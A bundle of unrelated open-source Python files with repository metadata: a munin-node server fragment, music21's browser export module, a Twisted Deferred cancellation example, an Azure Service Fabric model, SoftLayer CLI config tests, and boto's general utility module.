self.wfile.write("%s\n" % " ".join(plugins))
elif cmd[0] == "nodes":
self.wfile.write("nodes\n%s\n.\n" % (node_name))
elif cmd[0] == "version":
self.wfile.write("munins node on chatter1 version: 1.2.6\n")
elif cmd[0] in ("fetch", "config"):
if plugin not in plugins:
self.wfile.write("# Unknown service\n.\n")
continue
c = (cmd[0] == "config") and "config" or ""
out = execute_plugin(os.path.join(self.server.options.plugin_path, plugin), c)
self.wfile.write(out)
if out and out[-1] != "\n":
self.wfile.write("\n")
self.wfile.write(".\n")
elif cmd[0] == "quit":
break
else:
self.wfile.write("# Unknown command. Try list, nodes, config, fetch, version or quit\n")
class MuninServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
if __name__ == "__main__":
HOST, PORT = "0.0.0.0", 4949
if sys.version_info[:3] >= (2, 6, 0):
server = MuninServer((HOST, PORT), MuninRequestHandler, bind_and_activate=False)
server.allow_reuse_address = True
server.server_bind()
server.server_activate()
else:
server = MuninServer((HOST, PORT), MuninRequestHandler)
ip, port = server.server_address
options, args = parse_args()
options.plugin_path = os.path.abspath(options.plugin_path)
server.options = options
become_daemon()
server.serve_forever()
| {
"content_hash": "a05165fd4d136057fedf84deba29a83c",
"timestamp": "",
"source": "github",
"line_count": 148,
"max_line_length": 104,
"avg_line_length": 34.12837837837838,
"alnum_prop": 0.5394971292813304,
"repo_name": "Mitali-Sodhi/CodeLingo",
"id": "34efcd2fa0d9b2972a31242888b341e72c732be2",
"size": "5074",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "Dataset/python/munin-node.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "9681846"
},
{
"name": "C#",
"bytes": "1741915"
},
{
"name": "C++",
"bytes": "5686017"
},
{
"name": "HTML",
"bytes": "11812193"
},
{
"name": "Java",
"bytes": "11198971"
},
{
"name": "JavaScript",
"bytes": "21693468"
},
{
"name": "M",
"bytes": "61627"
},
{
"name": "Objective-C",
"bytes": "4085820"
},
{
"name": "Perl",
"bytes": "193472"
},
{
"name": "Perl6",
"bytes": "176248"
},
{
"name": "Python",
"bytes": "10296284"
},
{
"name": "Ruby",
"bytes": "1050136"
}
],
"symlink_target": ""
} |
'''
Convert a music21 object into JSON and send it to the browser for music21j to use.
'''
import unittest
from music21.exceptions21 import Music21Exception
from music21 import freezeThaw
from music21 import stream
supportedDisplayModes = [
'html',
'jsbody',
'jsbodyScript',
'json'
]
def fromObject(thisObject, mode='html', local=False):
'''
returns a string of data for a given Music21Object such as a Score, Note, etc. that
can be displayed in a browser using the music21j package. Called by .show('vexflow').
>>> n = note.Note('C#4')
>>> #_DOCS_SHOW print(vexflow.toMusic21j.fromObject(n))
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<!-- for MSIE 10 on Windows 8 -->
<meta http-equiv="X-UA-Compatible" content="requiresActiveX=true"/>
<title>Music21 Fragment</title>
<script data-main='http://web.mit.edu/music21/music21j/src/music21' src='http://web.mit.edu/music21/music21j/ext/require/require.js'></script>
<script>
require(['music21'], function() {
var pickleIn = '{"m21Version": {"py/tuple": [1, 9, 2]}, "stream": {"_mutable": true, "_activeSite": null, "xPosition": null, "' +
'_priority": 0, "_elements": [], "_cache": {}, "definesExplicitPageBreaks": false, "_unlinkedDuration": null, "' +
'id": ..., "_duration": null, "py/object": "music21.stream.Stream", "streamStatus": {"py/object": "music' +
'21.stream.streamStatus.StreamStatus", "_enharmonics": null, "_dirty": null, "_concertPitch": null, "_accidenta' +
'ls": null, "_ties": null, "_rests": null, "_ornaments": null, "_client": null, "_beams": null, "_measures": nu' +
...
'd": null}, "definesExplicitSystemBreaks": false, ...}}';
var jpc = new music21.fromPython.Converter();
streamObj = jpc.run(pickleIn);
streamObj.renderOptions.events.resize = "reflow";
streamObj.appendNewCanvas();
});
</script>
<BLANKLINE>
</head>
<body>
</body>
</html>
'''
conv = VexflowPickler()
conv.mode = mode
conv.useLocal = local
return conv.fromObject(thisObject)
class VexflowPickler(object):
templateHtml = '''<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<!-- for MSIE 10 on Windows 8 -->
<meta http-equiv="X-UA-Compatible" content="requiresActiveX=true"/>
<title>{title}</title>
{loadM21Template}
{jsBodyScript}
</head>
<body>
</body>
</html>
'''
jsBodyScript = '''<script>\n{jsBody}\n</script>'''
jsBody = '''require(['music21'], function() {{
var pickleIn = {pickleOutput};
var jpc = new music21.jsonPickle.Converter();
streamObj = jpc.run(pickleIn);
{callback}
}});'''
loadM21Template = '''<script data-main='{m21URI}' src='{requireURI}'></script>'''
def __init__(self):
self.defaults = {
'pickleOutput' : '{"py/object": "hello"}',
'm21URI' : 'http://web.mit.edu/music21/music21j/src/music21',
'requireURI' :'http://web.mit.edu/music21/music21j/ext/require/require.js',
'callback' :'streamObj.renderOptions.events.resize = "reflow";\n\t\tstreamObj.appendNewCanvas();',
'm21URIlocal' : 'file:///Users/Cuthbert/git/music21j/src/music21',
'requireURIlocal' : 'file:///Users/Cuthbert/git/music21j/ext/require/require.js',
}
self.mode = 'html'
self.useLocal = False
def fromObject(self, thisObject, mode=None):
if mode is None:
mode = self.mode
if (thisObject.isStream is False):
retStream = stream.Stream()
retStream.append(thisObject)
else:
retStream = thisObject
return self.fromStream(retStream, mode=mode)
def splitLongJSON(self, jsonString, chunkSize=110):
allJSONList = []
for i in range(0, len(jsonString), chunkSize):
allJSONList.append('\'' + jsonString[i:i+chunkSize] + '\'')
return ' + \n '.join(allJSONList)
def getLoadTemplate(self, urls=None):
'''
Gets the <script> tag for loading music21 from require.js
>>> vfp = vexflow.toMusic21j.VexflowPickler()
>>> vfp.getLoadTemplate()
"<script data-main='http://web.mit.edu/music21/music21j/src/music21' src='http://web.mit.edu/music21/music21j/ext/require/require.js'></script>"
>>> d = {'m21URI': 'file:///tmp/music21', 'requireURI': 'http://requirejs.com/require.js'}
>>> vfp.getLoadTemplate(d)
"<script data-main='file:///tmp/music21' src='http://requirejs.com/require.js'></script>"
'''
if urls is None:
urls = self.defaults
if self.useLocal is False:
loadM21formatted = self.loadM21Template.format(m21URI = urls['m21URI'],
requireURI = urls['requireURI'],)
else:
loadM21formatted = self.loadM21Template.format(m21URI = urls['m21URIlocal'],
requireURI = urls['requireURIlocal'],)
return loadM21formatted
def getJSBodyScript(self, dataSplit, defaults = None):
'''
Get the <script>...</script> tag to render the JSON
>>> vfp = vexflow.toMusic21j.VexflowPickler()
>>> print(vfp.getJSBodyScript('{"hi": "hello"}'))
<script>
require(['music21'], function() {
var pickleIn = {"hi": "hello"};
var jpc = new music21.jsonPickle.Converter();
streamObj = jpc.run(pickleIn);
streamObj.renderOptions.events.resize = "reflow";
streamObj.appendNewCanvas();
});
</script>
'''
if defaults is None:
defaults = self.defaults
jsBody = self.getJSBody(dataSplit, defaults)
jsBodyScript = self.jsBodyScript.format(jsBody = jsBody)
return jsBodyScript
def getJSBody(self, dataSplit, defaults = None):
'''
Get the javascript code without the <script> tags to render the JSON
>>> vfp = vexflow.toMusic21j.VexflowPickler()
>>> print(vfp.getJSBody('{"hi": "hello"}'))
require(['music21'], function() {
var pickleIn = {"hi": "hello"};
var jpc = new music21.jsonPickle.Converter();
streamObj = jpc.run(pickleIn);
streamObj.renderOptions.events.resize = "reflow";
streamObj.appendNewCanvas();
});
'''
if defaults is None:
d = self.defaults
else:
d = defaults
jsBody = self.jsBody.format(pickleOutput = dataSplit,
callback = d['callback'])
return jsBody
def getHTML(self, dataSplit, title=None, defaults=None):
'''
Get the complete HTML page to pass to the browser:
>>> vfp = vexflow.toMusic21j.VexflowPickler()
>>> print(vfp.getHTML('{"hi": "hello"}', 'myPiece'))
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<!-- for MSIE 10 on Windows 8 -->
<meta http-equiv="X-UA-Compatible" content="requiresActiveX=true"/>
<title>myPiece</title>
<script data-main='http://web.mit.edu/music21/music21j/src/music21' src='http://web.mit.edu/music21/music21j/ext/require/require.js'></script>
<script>
require(['music21'], function() {
var pickleIn = {"hi": "hello"};
var jpc = new music21.jsonPickle.Converter();
streamObj = jpc.run(pickleIn);
streamObj.renderOptions.events.resize = "reflow";
streamObj.appendNewCanvas();
});
</script>
</head>
<body>
</body>
</html>
'''
if defaults is None:
d = self.defaults
else:
d = defaults
loadM21Formatted = self.getLoadTemplate(d)
jsBodyScript = self.getJSBodyScript(dataSplit, d)
formatted = self.templateHtml.format(title = title,
loadM21Template=loadM21Formatted,
jsBodyScript=jsBodyScript)
return formatted
def fromStream(self, thisStream, mode=None):
if mode is None:
mode = self.mode
if (thisStream.metadata is not None and thisStream.metadata.title != ""):
title = thisStream.metadata.title
else:
title = "Music21 Fragment"
sf = freezeThaw.StreamFreezer(thisStream)
## recursive data structures will be expanded up to a high depth -- make sure there are none...
data = sf.writeStr(fmt='jsonpickle')
dataSplit = self.splitLongJSON(data)
if mode == 'json':
return data
elif mode == 'jsonSplit':
return dataSplit
elif mode == 'jsbody':
return self.getJSBody(dataSplit)
elif mode == 'jsbodyScript':
return self.getJSBodyScript(dataSplit)
elif mode == 'html':
return self.getHTML(dataSplit, title)
else:
raise VexflowToM21JException("Cannot deal with mode: %r" % mode)
class VexflowToM21JException(Music21Exception):
pass
class Test(unittest.TestCase):
def runTest(self):
pass
def testDummy(self):
pass
class TestExternal(unittest.TestCase):
def runTest(self):
pass
def testCuthbertLocal(self):
'''
test a local version of this mess...
'''
from music21 import corpus, environment
environLocal = environment.Environment()
s = corpus.parse('luca/gloria').measures(1,19)
#s = corpus.parse('beethoven/opus18no1', 2).parts[0].measures(4,10)
vfp = VexflowPickler()
vfp.defaults['m21URI'] = 'file:///Users/Cuthbert/git/music21j/src/music21'
vfp.defaults['requireURI'] = 'file:///Users/Cuthbert/git/music21j/ext/require/require.js'
data = vfp.fromObject(s)
fp = environLocal.getTempFile('.html')
with open(fp, 'w') as f:
f.write(data)
environLocal.launch('vexflow', fp)
if __name__ == "__main__":
import music21
music21.mainTest(Test)
# from music21 import note, clef, meter
# s = stream.Measure()
# s.insert(0, clef.TrebleClef())
# s.insert(0, meter.TimeSignature('1/4'))
# n = note.Note()
# n.duration.quarterLength = 1/3.
# s.repeatAppend(n, 3)
# p = stream.Part()
# p.repeatAppend(s, 2)
# p.show('vexflow', local=True)
#
#s.show('vexflow')
| {
"content_hash": "d66fb678feec8f03c19f3a93e35d5e22",
"timestamp": "",
"source": "github",
"line_count": 297,
"max_line_length": 154,
"avg_line_length": 39.67003367003367,
"alnum_prop": 0.5576302834832796,
"repo_name": "arnavd96/Cinemiezer",
"id": "6384f3ce95c6ca623403d707e0ffb7f38c308093",
"size": "12314",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "myvenv/lib/python3.4/site-packages/music21/vexflow/toMusic21j.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "300501"
},
{
"name": "C++",
"bytes": "14430"
},
{
"name": "CSS",
"bytes": "105126"
},
{
"name": "FORTRAN",
"bytes": "3200"
},
{
"name": "HTML",
"bytes": "290903"
},
{
"name": "JavaScript",
"bytes": "154747"
},
{
"name": "Jupyter Notebook",
"bytes": "558334"
},
{
"name": "Objective-C",
"bytes": "567"
},
{
"name": "Python",
"bytes": "37092739"
},
{
"name": "Shell",
"bytes": "3668"
},
{
"name": "TeX",
"bytes": "1527"
}
],
"symlink_target": ""
} |
from twisted.internet.defer import Deferred
def send_poem(d):
print('Sending poem')
d.callback('Once upon a midnight dreary')
def get_poem():
"""Return a poem 5 seconds later."""
def canceler(d):
# They don't want the poem anymore, so cancel the delayed call
delayed_call.cancel()
# At this point we have three choices:
# 1. Do nothing, and the deferred will fire the errback
# chain with CancelledError.
# 2. Fire the errback chain with a different error.
# 3. Fire the callback chain with an alternative result.
d = Deferred(canceler)
from twisted.internet import reactor
delayed_call = reactor.callLater(5, send_poem, d)
return d
def got_poem(poem):
print('I got a poem:', poem)
def poem_error(err):
print('get_poem failed:', err)
def main():
from twisted.internet import reactor
reactor.callLater(10, reactor.stop) # stop the reactor in 10 seconds
d = get_poem()
d.addCallbacks(got_poem, poem_error)
reactor.callLater(2, d.cancel) # cancel after 2 seconds
reactor.run()
main()
| {
"content_hash": "26ac964d2123dc2f5867612d4d284931",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 72,
"avg_line_length": 25.044444444444444,
"alnum_prop": 0.6512866015971606,
"repo_name": "jdavisp3/twisted-intro",
"id": "7e88e54cd1f6c8698f6dba58ae2ea668c96716e2",
"size": "1127",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "deferred-cancel/defer-cancel-11.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Erlang",
"bytes": "2523"
},
{
"name": "Haskell",
"bytes": "3262"
},
{
"name": "Makefile",
"bytes": "137"
},
{
"name": "Python",
"bytes": "118095"
},
{
"name": "Shell",
"bytes": "86"
}
],
"symlink_target": ""
} |
from .entity_health_state import EntityHealthState
class ReplicaHealthState(EntityHealthState):
"""Represents a base class for stateful service replica or stateless service
instance health state.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: StatefulServiceReplicaHealthState,
StatelessServiceInstanceHealthState
:param aggregated_health_state: The health state of a Service Fabric
entity such as Cluster, Node, Application, Service, Partition, Replica
etc. Possible values include: 'Invalid', 'Ok', 'Warning', 'Error',
'Unknown'
:type aggregated_health_state: str or
~azure.servicefabric.models.HealthState
:param partition_id: The ID of the partition to which this replica
belongs.
:type partition_id: str
:param service_kind: Constant filled by server.
:type service_kind: str
"""
_validation = {
'service_kind': {'required': True},
}
_attribute_map = {
'aggregated_health_state': {'key': 'AggregatedHealthState', 'type': 'str'},
'partition_id': {'key': 'PartitionId', 'type': 'str'},
'service_kind': {'key': 'ServiceKind', 'type': 'str'},
}
_subtype_map = {
'service_kind': {'Stateful': 'StatefulServiceReplicaHealthState', 'Stateless': 'StatelessServiceInstanceHealthState'}
}
def __init__(self, aggregated_health_state=None, partition_id=None):
super(ReplicaHealthState, self).__init__(aggregated_health_state=aggregated_health_state)
self.partition_id = partition_id
self.service_kind = None
self.service_kind = 'ReplicaHealthState'
| {
"content_hash": "4ec35d4a64f6cb541618cfea89fd32f5",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 125,
"avg_line_length": 38.7906976744186,
"alnum_prop": 0.684052757793765,
"repo_name": "lmazuel/azure-sdk-for-python",
"id": "894b4bc3c12de48a13694ae68d608b8744df4ea1",
"size": "2142",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "azure-servicefabric/azure/servicefabric/models/replica_health_state.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "42572767"
}
],
"symlink_target": ""
} |
"""
SoftLayer.tests.CLI.modules.config_tests
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:license: MIT, see LICENSE for more details.
"""
import json
import tempfile
import mock
import SoftLayer
from SoftLayer import auth
from SoftLayer.CLI.config import setup as config
from SoftLayer.CLI import exceptions
from SoftLayer import consts
from SoftLayer import testing
from SoftLayer import transports
class TestHelpShow(testing.TestCase):
def set_up(self):
transport = transports.XmlRpcTransport(
endpoint_url='http://endpoint-url',
)
self.env.client = SoftLayer.BaseClient(
transport=transport,
auth=auth.BasicAuthentication('username', 'api-key'))
def test_show(self):
result = self.run_command(['config', 'show'])
self.assertEqual(result.exit_code, 0)
self.assertEqual(json.loads(result.output),
{'Username': 'username',
'API Key': 'api-key',
'Endpoint URL': 'http://endpoint-url',
'Timeout': 'not set'})
class TestHelpSetup(testing.TestCase):
def set_up(self):
super(TestHelpSetup, self).set_up()
# NOTE(kmcdonald): since the endpoint_url is changed with the client
# in these commands, we need to ensure that a fixtured transport is
# used.
transport = testing.MockableTransport(SoftLayer.FixtureTransport())
self.env.client = SoftLayer.BaseClient(transport=transport)
@mock.patch('SoftLayer.CLI.formatting.confirm')
@mock.patch('SoftLayer.CLI.environment.Environment.getpass')
@mock.patch('SoftLayer.CLI.environment.Environment.input')
def test_setup(self, input, getpass, confirm_mock):
with tempfile.NamedTemporaryFile() as config_file:
confirm_mock.return_value = True
getpass.return_value = 'A' * 64
input.side_effect = ['user', 'public', 0]
result = self.run_command(['--config=%s' % config_file.name,
'config', 'setup'])
self.assertEqual(result.exit_code, 0)
self.assertTrue('Configuration Updated Successfully'
in result.output)
contents = config_file.read().decode("utf-8")
self.assertTrue('[softlayer]' in contents)
self.assertTrue('username = user' in contents)
self.assertTrue('api_key = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in contents)
self.assertTrue('endpoint_url = %s' % consts.API_PUBLIC_ENDPOINT
in contents)
@mock.patch('SoftLayer.CLI.formatting.confirm')
@mock.patch('SoftLayer.CLI.environment.Environment.getpass')
@mock.patch('SoftLayer.CLI.environment.Environment.input')
def test_setup_cancel(self, input, getpass, confirm_mock):
with tempfile.NamedTemporaryFile() as config_file:
confirm_mock.return_value = False
getpass.return_value = 'A' * 64
input.side_effect = ['user', 'public', 0]
result = self.run_command(['--config=%s' % config_file.name,
'config', 'setup'])
self.assertEqual(result.exit_code, 2)
self.assertIsInstance(result.exception, exceptions.CLIAbort)
@mock.patch('SoftLayer.CLI.environment.Environment.getpass')
@mock.patch('SoftLayer.CLI.environment.Environment.input')
def test_get_user_input_private(self, input, getpass):
getpass.return_value = 'A' * 64
input.side_effect = ['user', 'private', 0]
username, secret, endpoint_url, timeout = (
config.get_user_input(self.env))
self.assertEqual(username, 'user')
self.assertEqual(secret, 'A' * 64)
self.assertEqual(endpoint_url, consts.API_PRIVATE_ENDPOINT)
@mock.patch('SoftLayer.CLI.environment.Environment.getpass')
@mock.patch('SoftLayer.CLI.environment.Environment.input')
def test_get_user_input_custom(self, input, getpass):
getpass.return_value = 'A' * 64
input.side_effect = ['user', 'custom', 'custom-endpoint', 0]
_, _, endpoint_url, _ = config.get_user_input(self.env)
self.assertEqual(endpoint_url, 'custom-endpoint')
@mock.patch('SoftLayer.CLI.environment.Environment.getpass')
@mock.patch('SoftLayer.CLI.environment.Environment.input')
def test_get_user_input_default(self, input, getpass):
self.env.getpass.return_value = 'A' * 64
self.env.input.side_effect = ['user', 'public', 0]
_, _, endpoint_url, _ = config.get_user_input(self.env)
self.assertEqual(endpoint_url, consts.API_PUBLIC_ENDPOINT)
| {
"content_hash": "294f7950df4602db0cc45f052c704a67",
"timestamp": "",
"source": "github",
"line_count": 122,
"max_line_length": 76,
"avg_line_length": 39.33606557377049,
"alnum_prop": 0.6217962075432382,
"repo_name": "iftekeriba/softlayer-python",
"id": "db0ed6b8a58668d1dace482d5688d9eda292ec56",
"size": "4799",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "SoftLayer/tests/CLI/modules/config_tests.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "DIGITAL Command Language",
"bytes": "854"
},
{
"name": "Python",
"bytes": "744378"
}
],
"symlink_target": ""
} |
"""
Some handy utility functions used by several classes.
"""
import re
import urllib
import urllib2
import subprocess
import StringIO
import time
import logging.handlers
import boto
import tempfile
import smtplib
import datetime
from email.MIMEMultipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email.MIMEText import MIMEText
from email.Utils import formatdate
from email import Encoders
try:
import hashlib
_hashfn = hashlib.sha512
except ImportError:
import md5
_hashfn = md5.md5
METADATA_PREFIX = 'x-amz-meta-'
AMAZON_HEADER_PREFIX = 'x-amz-'
# generates the aws canonical string for the given parameters
def canonical_string(method, path, headers, expires=None):
interesting_headers = {}
for key in headers:
lk = key.lower()
if lk in ['content-md5', 'content-type', 'date'] or lk.startswith(AMAZON_HEADER_PREFIX):
interesting_headers[lk] = headers[key].strip()
# these keys get empty strings if they don't exist
if not interesting_headers.has_key('content-type'):
interesting_headers['content-type'] = ''
if not interesting_headers.has_key('content-md5'):
interesting_headers['content-md5'] = ''
# just in case someone used this. it's not necessary in this lib.
if interesting_headers.has_key('x-amz-date'):
interesting_headers['date'] = ''
# if you're using expires for query string auth, then it trumps date
# (and x-amz-date)
if expires:
interesting_headers['date'] = str(expires)
sorted_header_keys = interesting_headers.keys()
sorted_header_keys.sort()
buf = "%s\n" % method
for key in sorted_header_keys:
val = interesting_headers[key]
if key.startswith(AMAZON_HEADER_PREFIX):
buf += "%s:%s\n" % (key, val)
else:
buf += "%s\n" % val
# don't include anything after the first ? in the resource...
buf += "%s" % path.split('?')[0]
# ...unless there is an acl or torrent parameter
if re.search("[&?]acl($|=|&)", path):
buf += "?acl"
elif re.search("[&?]logging($|=|&)", path):
buf += "?logging"
elif re.search("[&?]torrent($|=|&)", path):
buf += "?torrent"
elif re.search("[&?]location($|=|&)", path):
buf += "?location"
elif re.search("[&?]requestPayment($|=|&)", path):
buf += "?requestPayment"
elif re.search("[&?]versions($|=|&)", path):
buf += "?versions"
elif re.search("[&?]versioning($|=|&)", path):
buf += "?versioning"
else:
m = re.search("[&?]versionId=([^&]+)($|=|&)", path)
if m:
buf += '?versionId=' + m.group(1)
return buf
def merge_meta(headers, metadata):
final_headers = headers.copy()
for k in metadata.keys():
if k.lower() in ['cache-control', 'content-md5', 'content-type',
'content-encoding', 'content-disposition',
'date', 'expires']:
final_headers[k] = metadata[k]
else:
final_headers[METADATA_PREFIX + k] = metadata[k]
return final_headers
def get_aws_metadata(headers):
metadata = {}
for hkey in headers.keys():
if hkey.lower().startswith(METADATA_PREFIX):
val = urllib.unquote_plus(headers[hkey])
metadata[hkey[len(METADATA_PREFIX):]] = unicode(val, 'utf-8')
del headers[hkey]
return metadata
def retry_url(url, retry_on_404=True):
for i in range(0, 10):
try:
req = urllib2.Request(url)
resp = urllib2.urlopen(req)
return resp.read()
except urllib2.HTTPError, e:
# in 2.6 you use getcode(), in 2.5 and earlier you use code
if hasattr(e, 'getcode'):
code = e.getcode()
else:
code = e.code
if code == 404 and not retry_on_404:
return ''
except:
pass
boto.log.exception('Caught exception reading instance data')
time.sleep(2**i)
boto.log.error('Unable to read instance data, giving up')
return ''
def _get_instance_metadata(url):
d = {}
data = retry_url(url)
if data:
fields = data.split('\n')
for field in fields:
if field.endswith('/'):
d[field[0:-1]] = _get_instance_metadata(url + field)
else:
p = field.find('=')
if p > 0:
key = field[p+1:]
resource = field[0:p] + '/openssh-key'
else:
key = resource = field
val = retry_url(url + resource)
p = val.find('\n')
if p > 0:
val = val.split('\n')
d[key] = val
return d
def get_instance_metadata(version='latest'):
"""
Returns the instance metadata as a nested Python dictionary.
Simple values (e.g. local_hostname, hostname, etc.) will be
stored as string values. Values such as ancestor-ami-ids will
be stored in the dict as a list of string values. More complex
fields such as public-keys and will be stored as nested dicts.
"""
url = 'http://169.254.169.254/%s/meta-data/' % version
return _get_instance_metadata(url)
def get_instance_userdata(version='latest', sep=None):
url = 'http://169.254.169.254/%s/user-data' % version
user_data = retry_url(url, retry_on_404=False)
if user_data:
if sep:
l = user_data.split(sep)
user_data = {}
for nvpair in l:
t = nvpair.split('=')
user_data[t[0].strip()] = t[1].strip()
return user_data
ISO8601 = '%Y-%m-%dT%H:%M:%SZ'
def get_ts(ts=None):
if not ts:
ts = time.gmtime()
return time.strftime(ISO8601, ts)
def parse_ts(ts):
return datetime.datetime.strptime(ts, ISO8601)
def find_class(module_name, class_name=None):
if class_name:
module_name = "%s.%s" % (module_name, class_name)
modules = module_name.split('.')
c = None
try:
for m in modules[1:]:
if c:
c = getattr(c, m)
else:
c = getattr(__import__(".".join(modules[0:-1])), m)
return c
except:
return None
def update_dme(username, password, dme_id, ip_address):
"""
Update your Dynamic DNS record with DNSMadeEasy.com
"""
dme_url = 'https://www.dnsmadeeasy.com/servlet/updateip'
dme_url += '?username=%s&password=%s&id=%s&ip=%s'
s = urllib2.urlopen(dme_url % (username, password, dme_id, ip_address))
return s.read()
def fetch_file(uri, file=None, username=None, password=None):
"""
Fetch a file based on the URI provided. If you do not pass in a file pointer
a tempfile.NamedTemporaryFile, or None if the file could not be
retrieved is returned.
The URI can be either an HTTP url, or "s3://bucket_name/key_name"
"""
boto.log.info('Fetching %s' % uri)
if file == None:
file = tempfile.NamedTemporaryFile()
try:
if uri.startswith('s3://'):
bucket_name, key_name = uri[len('s3://'):].split('/', 1)
c = boto.connect_s3()
bucket = c.get_bucket(bucket_name)
key = bucket.get_key(key_name)
key.get_contents_to_file(file)
else:
if username and password:
passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
passman.add_password(None, uri, username, password)
authhandler = urllib2.HTTPBasicAuthHandler(passman)
opener = urllib2.build_opener(authhandler)
urllib2.install_opener(opener)
s = urllib2.urlopen(uri)
file.write(s.read())
file.seek(0)
except:
raise
boto.log.exception('Problem Retrieving file: %s' % uri)
file = None
return file
class ShellCommand(object):
def __init__(self, command, wait=True):
self.exit_code = 0
self.command = command
self.log_fp = StringIO.StringIO()
self.wait = wait
self.run()
def run(self):
boto.log.info('running:%s' % self.command)
self.process = subprocess.Popen(self.command, shell=True, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if(self.wait):
while self.process.poll() == None:
time.sleep(1)
t = self.process.communicate()
self.log_fp.write(t[0])
self.log_fp.write(t[1])
boto.log.info(self.log_fp.getvalue())
self.exit_code = self.process.returncode
return self.exit_code
def setReadOnly(self, value):
raise AttributeError
def getStatus(self):
return self.exit_code
status = property(getStatus, setReadOnly, None, 'The exit code for the command')
def getOutput(self):
return self.log_fp.getvalue()
output = property(getOutput, setReadOnly, None, 'The STDIN and STDERR output of the command')
class AuthSMTPHandler(logging.handlers.SMTPHandler):
"""
This class extends the SMTPHandler in the standard Python logging module
to accept a username and password on the constructor and to then use those
credentials to authenticate with the SMTP server. To use this, you could
add something like this in your boto config file:
[handler_hand07]
class=boto.utils.AuthSMTPHandler
level=WARN
formatter=form07
args=('localhost', 'username', 'password', 'from@abc', ['user1@abc', 'user2@xyz'], 'Logger Subject')
"""
def __init__(self, mailhost, username, password, fromaddr, toaddrs, subject):
"""
Initialize the handler.
We have extended the constructor to accept a username/password
for SMTP authentication.
"""
logging.handlers.SMTPHandler.__init__(self, mailhost, fromaddr, toaddrs, subject)
self.username = username
self.password = password
def emit(self, record):
"""
Emit a record.
Format the record and send it to the specified addressees.
It would be really nice if I could add authorization to this class
without having to resort to cut and paste inheritance but, no.
"""
try:
port = self.mailport
if not port:
port = smtplib.SMTP_PORT
smtp = smtplib.SMTP(self.mailhost, port)
smtp.login(self.username, self.password)
msg = self.format(record)
msg = "From: %s\r\nTo: %s\r\nSubject: %s\r\nDate: %s\r\n\r\n%s" % (
self.fromaddr,
','.join(self.toaddrs),
self.getSubject(record),
formatdate(), msg)
smtp.sendmail(self.fromaddr, self.toaddrs, msg)
smtp.quit()
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
class LRUCache(dict):
"""A dictionary-like object that stores only a certain number of items, and
discards its least recently used item when full.
>>> cache = LRUCache(3)
>>> cache['A'] = 0
>>> cache['B'] = 1
>>> cache['C'] = 2
>>> len(cache)
3
>>> cache['A']
0
Adding new items to the cache does not increase its size. Instead, the least
recently used item is dropped:
>>> cache['D'] = 3
>>> len(cache)
3
>>> 'B' in cache
False
Iterating over the cache returns the keys, starting with the most recently
used:
>>> for key in cache:
... print key
D
A
C
This code is based on the LRUCache class from Genshi which is based on
Mighty's LRUCache from ``myghtyutils.util``, written
by Mike Bayer and released under the MIT license (Genshi uses the
BSD License). See:
http://svn.myghty.org/myghtyutils/trunk/lib/myghtyutils/util.py
"""
class _Item(object):
def __init__(self, key, value):
self.previous = self.next = None
self.key = key
self.value = value
def __repr__(self):
return repr(self.value)
def __init__(self, capacity):
self._dict = dict()
self.capacity = capacity
self.head = None
self.tail = None
def __contains__(self, key):
return key in self._dict
def __iter__(self):
cur = self.head
while cur:
yield cur.key
cur = cur.next
def __len__(self):
return len(self._dict)
def __getitem__(self, key):
item = self._dict[key]
self._update_item(item)
return item.value
def __setitem__(self, key, value):
item = self._dict.get(key)
if item is None:
item = self._Item(key, value)
self._dict[key] = item
self._insert_item(item)
else:
item.value = value
self._update_item(item)
self._manage_size()
def __repr__(self):
return repr(self._dict)
def _insert_item(self, item):
item.previous = None
item.next = self.head
if self.head is not None:
self.head.previous = item
else:
self.tail = item
self.head = item
self._manage_size()
def _manage_size(self):
while len(self._dict) > self.capacity:
del self._dict[self.tail.key]
if self.tail != self.head:
self.tail = self.tail.previous
self.tail.next = None
else:
self.head = self.tail = None
def _update_item(self, item):
if self.head == item:
return
previous = item.previous
previous.next = item.next
if item.next is not None:
item.next.previous = previous
else:
self.tail = previous
item.previous = None
item.next = self.head
self.head.previous = self.head = item
class Password(object):
"""
Password object that stores itself as SHA512 hashed.
"""
def __init__(self, str=None):
"""
Load the string from an initial value, this should be the raw SHA512 hashed password
"""
self.str = str
def set(self, value):
self.str = _hashfn(value).hexdigest()
def __str__(self):
return str(self.str)
def __eq__(self, other):
if other == None:
return False
return str(_hashfn(other).hexdigest()) == str(self.str)
def __len__(self):
if self.str:
return len(self.str)
else:
return 0
